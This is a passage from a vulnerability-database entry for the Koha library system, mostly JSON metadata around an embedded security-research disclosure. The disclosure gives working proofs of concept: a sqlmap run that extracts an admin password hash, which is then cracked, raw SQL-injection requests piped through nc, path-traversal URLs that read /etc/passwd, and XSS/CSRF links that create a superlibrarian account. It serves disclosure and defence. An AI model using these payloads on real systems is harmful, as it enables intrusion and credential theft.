"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-02-07T00:00:00",
"db": "BID",
"id": "65448"
},
{
"date": "2020-02-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-008841"
},
{
"date": "2020-01-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202001-1092"
},
{
"date": "2020-01-24T17:15:12.173000",
"db": "NVD",
"id": "CVE-2014-1922"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-02-07T00:00:00",
"db": "BID",
"id": "65448"
},
{
"date": "2020-02-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-008841"
},
{
"date": "2021-01-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202001-1092"
},
{
"date": "2024-11-21T02:05:16.780000",
"db": "NVD",
"id": "CVE-2014-1922"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "65448"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Koha\u00a0 Vulnerabilities in path traversal",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-008841"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "path traversal",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202001-1092"
}
],
"trust": 0.6
}
}
var-201810-0025
Vulnerability from variot
Multiple directory traversal vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search. Koha Contains a path traversal vulnerability.Information may be obtained. Koha is the first open source library automation system. Koha has a SQL injection vulnerability that allows an attacker to exploit a vulnerability to access or modify database data. Koha is prone to the following security vulnerabilities: 1. Multiple SQL-injection vulnerabilities 2. Multiple directory-traversal vulnerabilities 3. Multiple HTML Injection vulnerabilities 4. Multiple cross-site scripting vulnerabilities 5. Multiple cross site request forgery vulnerabilities An attacker may leverage these issues to access or modify data, exploit latent vulnerabilities in the underlying database, read arbitrary files,allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user and to perform unauthorized actions in the context of a logged-in user of the affected application.This may aid in further attacks. =============================================================================================== SBA Research Vulnerability Disclosure ===============================================================================================
title: Koha Unauthenticated SQL injection product: Koha ILS affected version: 3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12 fixed version: 3.20.1, 3.17.8, 3.16.12 CVE numbers: CVE-2015-4633, CVE-2015-4632, CVE-2015-4631 impact: critical website: http://www.koha-community.org/
found by: Raschin Tavakoli / SBA Research Combinatorial Security Testing Group contact: cst@sba-research.org
References: http://koha-community.org/security-release-koha-3-20-1/ http://koha-community.org/security-release-koha-3-18-8/ http://koha-community.org/security-release-koha-3-16-12/
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423
===============================================================================================
========================= 1. Mutiple SQL Injections =========================
- ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +
- a) Unauthenticated SQL Injection in OPAC interface (CVE-2015-4633) +
- ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +
Vulnerability:
The url parameter 'number' in /cgi-bin/koha/opac-tags_subject.pl is vulnerable to SQLI. If the webserver is misconfigured, the file-system may be accessed as well.
References:
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412
##################################################################################################
PoC:
##################################################################################################
- Inspect Koha database schema
Have a look at how to query the database for superlibrarian users: http://wiki.koha-community.org/wiki/SQL_Reports_Library#Superlibrarians
So basically we we need to execute some SQL statement like this: sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;
- Query the database with sqlmap
So let's fire up sqlmap with the --sql-shell parameter and input the query:
root@kali:/home/wicked# sqlmap -u http://testbox:9001/cgi-bin/koha/opac-tags_subject.pl?number=10 -p number --technique=T --dbms=MySQL --sql-shell --time-sec=4 _ ___ | | ___ ___ {1.0-dev-nongit-20150513} | -| . | | | .'| . | || |||||__,| | || || http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 09:20:07
[09:20:07] [INFO] testing connection to the target URL sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Parameter: number (GET) Type: AND/OR time-based blind Title: MySQL >= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE) Payload: number=1 PROCEDURE ANALYSE(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(4000000,MD5(0x4b754a4b))))),1) --- [09:20:09] [INFO] testing MySQL [09:20:09] [INFO] confirming MySQL [09:20:09] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian web application technology: Apache 2.4.10 back-end DBMS: MySQL >= 5.0.0 [09:20:09] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1; [09:20:25] [INFO] fetching SQL SELECT statement query output: 'select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1' [09:20:25] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind [09:20:25] [WARNING] time-based comparison requires larger statistical model, please wait.............................. [09:20:52] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors admin [09:21:46] [INFO] retrieved: $2a$08$taQ [09:23:33] [ERROR] invalid character detected. retrying.. [09:23:33] [WARNING] increasing time delay to 5 seconds afOgEEhU [09:25:10] [ERROR] invalid character detected. retrying.. [09:25:10] [WARNING] increasing time delay to 6 seconds t/gW [09:26:13] [ERROR] invalid character detected. retrying.. [09:26:13] [WARNING] increasing time delay to 7 seconds TOmqnYe1Y6ZNxCENa [09:29:57] [ERROR] invalid character detected. retrying.. [09:29:57] [WARNING] increasing time delay to 8 seconds 2.ONk2eZhnuEw5z9OjjxS [09:35:08] [ERROR] invalid character detected. retrying.. [09:35:08] [WARNING] increasing time delay to 9 seconds
select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;: 'admin, $2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS'
- Feed john the ripper and be lucky
root@kali:/home/wicked# echo "$2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS" > ./admin-pass root@kali:/home/wicked# john ./admin-pass Loaded 1 password hash (OpenBSD Blowfish [32/64 X2]) admin (?) guesses: 1 time: 0:00:00:10 DONE (Thu Jun 25 09:45:41 2015) c/s: 260 trying: Smokey - allstate Use the "--show" option to display all of the cracked passwords reliably
root@kali:/home/wicked# john ./admin-pass --show ?:admin
1 password hash cracked, 0 left
- If the webserver is misconfigured, read & write access to the filesystem may be possible.
References:
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426
##################################################################################################
PoC:
##################################################################################################
==================================================================== 1. "Criteria" Parameter, Payload: ELT(1=1,'evil') / ELT(1=2,'evil') ====================================================================
echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=&password=&branch=&koha_login_context=intranet&Criteria=ELT(1=2,'evil')" | nc testbox 9002
echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=&password=&branch=&koha_login_context=intranet&Criteria=ELT(1=1,'evil')" | nc testbox 9002
==================================================================== 2. "Filter" Parameter, Payload: P_COM'+AND+'a'='a / P_COM'+AND+'a'='b ====================================================================
echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep=;&report_name=&do_it=1&userid=&password=&branch=&Filter=P_COM'+AND+'a'='a" | nc testbox 9002
echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep=;&report_name=&do_it=1&userid=&password=&branch=&Filter=P_COM'+AND+'a'='b" | nc testbox 9002
====================================================================
You will notice different output in every second request, demonstrating the evaluation of the payload.
##################################################################################################
PoC End
##################################################################################################
================================= 3.
References
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408
##################################################################################################
PoC:
##################################################################################################
The following input is used to print out /etc/passwd:
/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd /cgi-bin/koha/svc/members/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
##################################################################################################
PoC End
##################################################################################################
================================= 4. The site also lacks in the implementation of challenge tokens that prevent cross-site forgery (XSRF) attacks.
The attack can be performed by:
- through a compromised user account. User/Password retrieval can happen via brute force, sniffing or through SQLI (CVE-2015-4633)
- through a user clicking a malicious link (phishing mail, forum link etc.)
The following pages are affected from stored XSS flaws:
/cgi-bin/koha/opac-shelves.pl /cgi-bin/koha/virtualshelves/shelves.pl
The following pages are affected from relfective XSS flaws:
/cgi-bin/koha/opac-shelves.pl (parameters: "direction", "display") /cgi-bin/koha/opac-search.pl (parameters: "tag") /cgi-bin/koha/authorities/authorities-home.pl (parameters: "value") /cgi-bin/koha/acqui/lateorders.pl (parameters: "delay") /cgi-bin/koha/admin/auth_subfields_structure.pl (parameters: "authtypecode","tagfield") /cgi-bin/koha/admin/marc_subfields_structure.pl (parameters: "tagfield") /cgi-bin/koha/catalogue/search.pl (parameters: "limit") /cgi-bin/koha/serials/serials-search.pl (parameters: "bookseller_filter", "callnumber_filter", "EAN_filter", "ISSN_filter", "publisher_filter", "title_filter") /cgi-bin/koha/suggestion/suggestion.pl (parameters: "author", "collectiontitle", "copyrightdate", "isbn", "manageddate_from", "manageddate_to", "publishercode", "suggesteddate_from", "suggesteddate_to")
Impact
The vulnerabilites allow remote attackers to inject arbitrary web script or HTML in order to:
- escalate privileges by targeting staff members with XSRF
- target users via browser exploits
- target the webserver by combining with other server-side vulnerabilities.
References
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416 http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423 http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418
##################################################################################################
PoC / Attack Scenario:
##################################################################################################
Alice, a student with restricted permissions on the system, receives a phishing mail (or reads in some forum) and clicks the following link:
--> http:///cgi-bin/koha/opac-shelves.pl?shelves=1&addshelf=Malicious+Input+&sortfield=title&category=2&allow_add=0&allow_delete_own=1&allow_delete_other=0
Bob, library admin, recognizes the new malicious list entry. He logs into the staff area and browses the public lists in order to delete the entry. Once he opens
--> http:///cgi-bin/koha/virtualshelves/shelves.pl
the malcious code get's executed. The code can then perform any unauthorized actions with the pemissions of user bob. For example:
Create new user:
--> http://testbox:9002/cgi-bin/koha/members/memberentry.pl?nodouble=&destination=&check_member=&borrowernumber=&nodouble=&title=&firstname=&othernames=&sex=&streetnumber=&streettype=&address2=&city=&state=&zipcode=&country=&phone=&phonepro=&mobile=&email=&emailpro=&fax=&B_address=&B_address2=&B_city=&B_state=&B_zipcode=&B_country=&B_phone=&B_email=&contactnote=&altcontactsurname=&altcontactfirstname=&altcontactaddress1=&altcontactaddress2=&altcontactaddress3=&altcontactstate=&altcontactzipcode=&altcontactcountry=&altcontactphone=&sort1=&sort2=&dateexpiry=&opacnote=&borrowernotes=&patron_attr_1=&BorrowerMandatoryField=surname%7Cdateofbirth%7Ccardnumber%7Caddress&category_type=A&updtype=I&op=insert&surname=hacker&dateofbirth=10%2F06%2F2000&address=fictional&select_city=%7C%7C%7C&cardnumber=9182734629182364&branchcode=MAURES&categorycode=P_COM&dateenrolled=24%2F06%2F2015&userid=hacker&password=hacker&password2=hacker&patron_attr_1_code=PROFESSION&setting_messaging_prefs=1&modify=yes&borrowernumber=&save=Save&setting_extended_patron_attributes=1
Give the new user superlibririan permission:
--> http://testbox:9002/testbox:9002/cgi-bin/koha/members/member-flags.pl?member=7855&newflags=1&flag=superlibrarian
The attacker can now log as superlibrarian.
Side Note: In order to make the attack work, alice needs to be logged in to the Open Public Catalog interface at the time of when clicking the malicious link. Alice needs to have access to the OPAC interface and to have permissions to create public lists.
##################################################################################################
PoC / Attack Scenario End
##################################################################################################
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201810-0025",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "library software community koha",
"scope": null,
"trust": 3.0,
"vendor": "koha",
"version": null
},
{
"model": "koha",
"scope": "lt",
"trust": 1.0,
"vendor": "koha",
"version": "3.18.08"
},
{
"model": "koha",
"scope": "gte",
"trust": 1.0,
"vendor": "koha",
"version": "3.16.00"
},
{
"model": "koha",
"scope": "gte",
"trust": 1.0,
"vendor": "koha",
"version": "3.20.00"
},
{
"model": "koha",
"scope": "lt",
"trust": 1.0,
"vendor": "koha",
"version": "3.20.01"
},
{
"model": "koha",
"scope": "gte",
"trust": 1.0,
"vendor": "koha",
"version": "3.14.00"
},
{
"model": "koha",
"scope": "lt",
"trust": 1.0,
"vendor": "koha",
"version": "3.14.16"
},
{
"model": "koha",
"scope": "lt",
"trust": 1.0,
"vendor": "koha",
"version": "3.16.12"
},
{
"model": "koha",
"scope": "gte",
"trust": 1.0,
"vendor": "koha",
"version": "3.18.00"
},
{
"model": "koha",
"scope": "lt",
"trust": 0.8,
"vendor": "koha",
"version": "3.20.x"
},
{
"model": "koha",
"scope": "lt",
"trust": 0.8,
"vendor": "koha",
"version": "3.16.x"
},
{
"model": "koha",
"scope": "eq",
"trust": 0.8,
"vendor": "koha",
"version": "3.16.12"
},
{
"model": "koha",
"scope": "eq",
"trust": 0.8,
"vendor": "koha",
"version": "3.14.16"
},
{
"model": "koha",
"scope": "lt",
"trust": 0.8,
"vendor": "koha",
"version": "3.14.x"
},
{
"model": "koha",
"scope": "eq",
"trust": 0.8,
"vendor": "koha",
"version": "3.20.1"
},
{
"model": "koha",
"scope": "lt",
"trust": 0.8,
"vendor": "koha",
"version": "3.18.x"
},
{
"model": "koha",
"scope": "eq",
"trust": 0.8,
"vendor": "koha",
"version": "3.18.08"
},
{
"model": "koha",
"scope": "eq",
"trust": 0.6,
"vendor": "koha",
"version": "3.16.07"
},
{
"model": "koha",
"scope": "eq",
"trust": 0.6,
"vendor": "koha",
"version": "3.16.09"
},
{
"model": "koha",
"scope": "eq",
"trust": 0.6,
"vendor": "koha",
"version": "3.16.11"
},
{
"model": "koha",
"scope": "eq",
"trust": 0.6,
"vendor": "koha",
"version": "3.18.1"
},
{
"model": "koha",
"scope": "eq",
"trust": 0.6,
"vendor": "koha",
"version": "3.16.08"
},
{
"model": "koha",
"scope": "eq",
"trust": 0.6,
"vendor": "koha",
"version": "3.16.10"
},
{
"model": "koha",
"scope": "eq",
"trust": 0.6,
"vendor": "koha",
"version": "3.20.00"
},
{
"model": "koha",
"scope": "eq",
"trust": 0.6,
"vendor": "koha",
"version": "3.16.06"
},
{
"model": "koha",
"scope": "eq",
"trust": 0.6,
"vendor": "koha",
"version": "3.18.0"
},
{
"model": "library software community koha",
"scope": "eq",
"trust": 0.3,
"vendor": "koha",
"version": "3.20"
},
{
"model": "library software community koha",
"scope": "eq",
"trust": 0.3,
"vendor": "koha",
"version": "3.18.7"
},
{
"model": "library software community koha",
"scope": "eq",
"trust": 0.3,
"vendor": "koha",
"version": "3.18"
},
{
"model": "library software community koha",
"scope": "eq",
"trust": 0.3,
"vendor": "koha",
"version": "3.16.11"
},
{
"model": "library software community koha",
"scope": "eq",
"trust": 0.3,
"vendor": "koha",
"version": "3.16"
},
{
"model": "library software community koha",
"scope": "ne",
"trust": 0.3,
"vendor": "koha",
"version": "3.20.1"
},
{
"model": "library software community koha",
"scope": "ne",
"trust": 0.3,
"vendor": "koha",
"version": "3.18.8"
},
{
"model": "library software community koha",
"scope": "ne",
"trust": 0.3,
"vendor": "koha",
"version": "3.16.12"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05198"
},
{
"db": "CNVD",
"id": "CNVD-2015-05201"
},
{
"db": "CNVD",
"id": "CNVD-2015-05199"
},
{
"db": "CNVD",
"id": "CNVD-2015-05200"
},
{
"db": "CNVD",
"id": "CNVD-2015-05197"
},
{
"db": "BID",
"id": "75426"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008224"
},
{
"db": "CNNVD",
"id": "CNNVD-201512-697"
},
{
"db": "NVD",
"id": "CVE-2015-4632"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:koha:koha",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-008224"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Raschin Ghanad-Tavakoli",
"sources": [
{
"db": "BID",
"id": "75426"
},
{
"db": "CNNVD",
"id": "CNNVD-201512-697"
}
],
"trust": 0.9
},
"cve": "CVE-2015-4632",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2015-4632",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2015-05198",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2015-05201",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2015-05199",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2015-05200",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 7.8,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2015-05197",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2015-4632",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2015-4632",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2015-4632",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2015-05198",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2015-05201",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2015-05199",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2015-05200",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2015-05197",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201512-697",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2015-4632",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05198"
},
{
"db": "CNVD",
"id": "CNVD-2015-05201"
},
{
"db": "CNVD",
"id": "CNVD-2015-05199"
},
{
"db": "CNVD",
"id": "CNVD-2015-05200"
},
{
"db": "CNVD",
"id": "CNVD-2015-05197"
},
{
"db": "VULMON",
"id": "CVE-2015-4632"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008224"
},
{
"db": "CNNVD",
"id": "CNNVD-201512-697"
},
{
"db": "NVD",
"id": "CVE-2015-4632"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple directory traversal vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search. Koha Contains a path traversal vulnerability.Information may be obtained. Koha is the first open source library automation system. Koha has a SQL injection vulnerability that allows an attacker to exploit a vulnerability to access or modify database data. Koha is prone to the following security vulnerabilities:\n1. Multiple SQL-injection vulnerabilities\n2. Multiple directory-traversal vulnerabilities\n3. Multiple HTML Injection vulnerabilities\n4. Multiple cross-site scripting vulnerabilities\n5. Multiple cross site request forgery vulnerabilities\nAn attacker may leverage these issues to access or modify data, exploit latent vulnerabilities in the underlying database, read arbitrary files,allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user and to perform unauthorized actions in the context of a logged-in user of the affected application.This may aid in further attacks. ===============================================================================================\nSBA Research Vulnerability Disclosure\u00a0\n===============================================================================================\n\ntitle: \t\t\t Koha Unauthenticated SQL injection\nproduct: \t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Koha ILS\naffected version:\t3.20.x \u003c= 3.20.1, 3.18.x \u003c= 3.18.8, 3.16.x \u003c= 3.16.12\nfixed version:\t\t3.20.1, 3.17.8, 3.16.12\nCVE numbers:\tCVE-2015-4633, CVE-2015-4632, CVE-2015-4631\nimpact:\t\t\tcritical\nwebsite:\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://www.koha-community.org/\n\nfound by:\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Raschin Tavakoli / SBA Research Combinatorial Security Testing Group\ncontact:\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0cst@sba-research.org\n\n\nReferences:\t\thttp://koha-community.org/security-release-koha-3-20-1/\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://koha-community.org/security-release-koha-3-18-8/\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://koha-community.org/security-release-koha-3-16-12/\n\n\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u200bhttp://bugs.koha-community.org/bugzilla3/show_b